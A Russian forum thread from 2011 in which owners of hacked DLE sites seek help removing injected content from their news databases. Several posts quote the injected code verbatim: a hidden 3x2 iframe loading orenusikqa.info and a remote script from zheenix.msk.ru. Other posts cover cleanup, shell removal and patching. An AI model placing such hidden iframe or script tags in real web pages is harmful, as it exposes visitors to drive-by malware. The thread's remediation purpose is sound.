Взломали сайт на DLE

D
На сайте с 23.11.2008
Offline
120
#31

Я уже писал чт онужно убрать код с полной новости

<iframe src=\"http://orenusikqa.info/for.cgi?10\" width=\"3\" height=\"2\" style=\"visibility:hidden;\"></iframe>

Пробовал как стандартной автозаменой движка так и sql запросом

djos добавил 10.01.2011 в 15:54

Запрос дает поменять адре с сайта но полностю код убрать не получается....думаю виной знак \"

Хортица
На сайте с 22.12.2006
Offline
289
#32
psash:
Работать только с дампом

Если работать только с дампом или phpmyadmin, то есть вариант, но не бесплатный.

psash:
Выложи то что нужно убрать!

К сожалению или к счастью добрых саморитян все меньше и меньше...

psash:
Столько, сколько этого потребуется!

Если судить по тому, как ВЫ описали парой постов выше, то я думаю неделька.

djos:
думаю виной знак

Правильно думаете, потому решить проблему стандартными средствами ДЛЕ не всегда получается.

На XBit.Money (https://xbit.money/?rid=111) меняю крипту на гривны. Лучшие курсы Обмен Вашего PayPal/ЯД/QIWI/WebMoney и куча плюшек! Рекомендую (https://exchangex.ru/index.php?who=26749)
siv1987
На сайте с 02.04.2009
Offline
427
#33
psash:

стал удалять через админку сайта поиск и замена, удалил все кроме такого кода 76403bc14134a2b49668b579a3b33ae6, потому что он разный в каждой новости, а крыжить 40000 тыс новостей в ручную не хотелось. Не успел удалить, как появился другой подобный код, только ссылки были на другой сайт юкоза. И еще заметил, что полная новость не полностью, а лишь тот кусочек что и в краткой новости.
База новостей была размером 150 метров. Попытался открыть вордом, но это было не реально. Пришлось открывать блокнотом с плагинами и по частям копировать в ворд, а там уже через поиск и замену удалять. С ворда копировал в другой файл, который потом открыл через phpadmin и импортировал все обратно. Поставил заплатки. Посмотрим что будет.

psash добавил 10.01.2011 в 12:39
Если кому нужна помощь, помогу за символическую плату в удалении такого говна с новостей

Ворд это конечно жесть. Кажется тот же блокнот++ может заменять по регулярному выражению.

P
На сайте с 10.01.2011
Offline
0
#34
siv1987:
Ворд это конечно жесть. Кажется тот же блокнот++ может заменять по регулярному выражению.

Ворд это нормальная вещь, но конечно не для php программирования, а для замены текста отличный вариант

psash добавил 10.01.2011 в 19:55

djos:
Я уже писал чт онужно убрать код с полной новости

Пробовал как стандартной автозаменой движка так и sql запросом

djos добавил 10.01.2011 в 15:54
Запрос дает поменять адре с сайта но полностю код убрать не получается....думаю виной знак \"

С моей точки зрения, лучший вариант это открыть в ворде дамп и там произвести замену с помошью подстановочных знаков

psash добавил 10.01.2011 в 20:02

djos:
А как такую хрень удалить?
Запрос автозамены его суку не берет
<iframe src=\"http://orenusikqa.info/for.cgi?10\" width=\"3\" height=\"2\" style=\"visibility:hidden;\"></iframe>

открыть дамп таблицы dle_post в ворде и открыть окно поиск и замена, в дополнительных параметрах поставить галочку "Подстановочные знаки" и в поле "Найти" ввести

?iframe src*iframe?
а поле "Заменить на" оставить пустым и нажать "Заменить все"

И проблема будет решена, без всяких заморочек

psash добавил 10.01.2011 в 20:23

Сообщение от Kursor
php/perl + регулярки не отменяли вроде как. Сделать дамп и работать с текст. файлом. Хотя можно и в консоли)

Много умничают, а реальной помощи нет:

А как такую хрень удалить?
Запрос автозамены его суку не берет
Код:
<iframe src=\"http://orenusikqa.info/for.cgi?10\" width=\"3\" height=\"2\" style=\"visibility:hidden;\"></iframe>
Заправка картриджей в Москве по низким ценам (http://resurskab.ru/)
B1
На сайте с 09.01.2011
Offline
23
#35

Кто-нибудь подскажите в чем проблема?

У меня три сайта, все были на ДЛЕ 8.5 и все находятся на одном хостинге

Вчера зашёл на один из-них, и понял что начались серьёзные проблемы.

Проблема в том, что в ниже перечисленных местах, при каждом переходе по закладках (в админке и на сайте) - появляются ссылки нескольких сайтов 4 или 5-ти. Ссылки выглядят так (<a href=http://ля-ля-ля/ >скачать книги бесплатно без регистрации</a>).

- на сайте между новостями;

- в админке закладка "Настройки системы" (в поле - "Ключивые слова" и "Причина отключения сайта")

- в закладке "Добавить новость" (в поле - "Короткая новость и "Полная новость").

Пытался удалять но они появляются после каждого перехода!
При этом вся эта гадость на всех моих сайтах. Все они на дле 8.5.

А и ещё я пробовал ставить движок Wordpress (вместо ДЛЕ) - та же самая ситуация.

Может эта вся гадость на хостинге или в БД??

Как это можно исправить?

T
На сайте с 16.11.2009
Offline
26
#36

Да, вот посмотришь на все эти дыры и ужасаешься...страшновато потом на движки залезать))

Построить дом на участке (http://stroimdacha.ru) самому легко!
Last hErO
На сайте с 23.08.2006
Offline
128
#37

Сталкивался с такой проблемой.Вирус коды суют разные в разные файлы, я удалил код который отображается на сайте и удалил шелл, но еще один шелл не заметил так они засунули код в другой файл.Куда код пихнуть там мест много.Процесс -

1)удаляем шеллы - если файлов много на сайте скажите чтобы админы все внимательно обыскали просканили

2)дальше закрываем дыры http://dle-news.ru/bags/v90/1127-nedostatochnaya-filtraciya-vhodyaschih-dannyh.html по этим дырам только ломают других вроде как нет.Статья о взломе по этой системе на каких-то сайтах школьников хакеров вышла и их куча полезло на дле.У меня в админке сначало один взломал, потом второй и второй первого забанил со словами типа "место занято" бардак вообщем 😂 .Пока 4 года сайту до этого никто не ламал

3) менять пароли бд, админки и прочие

4) включить логи на домен если вдруг какой-то шелл остался (как у меня было его можно будет найти по статистике обращений к файлам) при этом лучше смотреть часто за сайтом чтобы найти время когда код всунули или на фтп дату редактировки файлов и папок искать.

Если есть бекап тогда - 1)востановить бекап 2) закрыть дыры.

D
На сайте с 23.11.2008
Offline
120
#38

А кроме того как скачать дамп себе и почистить вариантов нету? Неужто не можно как то почистить базу на севрере?

K
На сайте с 25.07.2010
Offline
94
#39

Подскажите, плиз, кто-нибудь регулярку для notepad++ чтобы этот код удалить

<script src="http://zheenix.msk.ru/784d98ce451cbb0d86f46f5bc8e11d1f.js" type="text/javascript"></script>
F
На сайте с 04.11.2009
Offline
73
#40

У Меня тоже в конце каждой новости скрипт на zheenix. Склоняюсь к тому что это из-за Grabber 3.11. Везде где установлен этот модуль в базе данных посторонние скрипты. Чтобы избавиться от этой проблемы надо:

1) Удалить всё с хостинга.

2) залить лицензию и бакап шаблонов.

3)сменить пароли бд

4) залить бэкап базы данных

5)Радуемся жизни.

Женский журнал (http://yablondi.ru/) Заработок на rich баннерах (http://adskape.ru/unireg.php?d=1&ref=24491) Лучшая монетизация на мой взгляд (http://www.sape.ru/r.AeICmqKaRn.php)

Авторизуйтесь или зарегистрируйтесь, чтобы оставить комментарий